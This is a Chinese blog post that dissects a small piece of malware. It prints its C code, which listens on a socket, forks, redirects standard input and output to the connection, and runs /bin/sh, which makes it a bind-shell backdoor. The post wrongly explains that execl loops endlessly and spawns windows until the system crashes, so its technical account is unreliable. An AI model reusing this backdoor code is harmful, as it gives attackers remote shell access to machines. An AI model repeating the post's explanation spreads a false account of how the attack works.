本文详细剖析了一种通过网络漏洞发起的病毒攻击方式,利用socket编程实现恶意代码植入,并通过无限循环调用/bin/sh的方式导致目标系统资源耗尽,直至崩溃。
今天会见了病毒,少量的代码,但在使用小漏洞的函数的,真正的杀伤力相当惊人。
转载请注明出处:http://blog.youkuaiyun.com/u010484477谢谢^_^
这个病毒前面就是常规的:
socket->bind->listen这个过程大家都
以下我想具体说一下它的攻击方式:
while ( 1 )
{
nsock = accept(sock, (struct sockaddr *)&v10, (socklen_t *)&v9);// wait to link
if ( nsock < 0 )
break;
if ( fork() ) // if Create progress is father progress
{
send(nsock, "\nConnected!\n\n", strlen("\nConnected!\n\n") - 1, 0);
send(nsock, "This fine tool coded by Bronc Buster\n", strlen("This fine tool coded by Bronc Buster\n") - 1, 0);//这是他在自己娱乐呢
send(
nsock,
"Please enter each command followed by ';'\n",
strlen("Please enter each command followed by ';'\n") - 1,
0);
dup2(nsock, 0);
dup2(nsock, 1);
dup2(nsock, 2);
execl("/bin/sh", "/bin/sh", 0);**************这句话就是真正的攻击了,先找找execl看看他咋攻击的呢
close(nsock);
exit(0);
}
close(nsock);
}
在execl中第一个參数是path即指向要运行的文件路径,第二个參数是运行该文件的參数列表。
在上面的代码中首先系统找到/bin/sh这一路径,然后是第二个參数运行/bin/sh。弹出一个窗体。而接下来/bin/sh又作为路径。继续寻找对应的參数列表,也就是/bin/sh。然后再运行。再弹窗。再查找,运行,弹窗,查找,运行,弹窗,查找。。。
。
一直下去,直到。。
直到电脑over
这个病毒写的杀伤力还是挺大的。(⊙o⊙)学无止境啊
最后是一句话送给大家:
非常多事情就像旅行一样,但你决定要出发的时候,最困难的部分已经完成!
版权声明:本文博客原创文章,博客,未经同意,不得转载。
扫一扫
1976
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
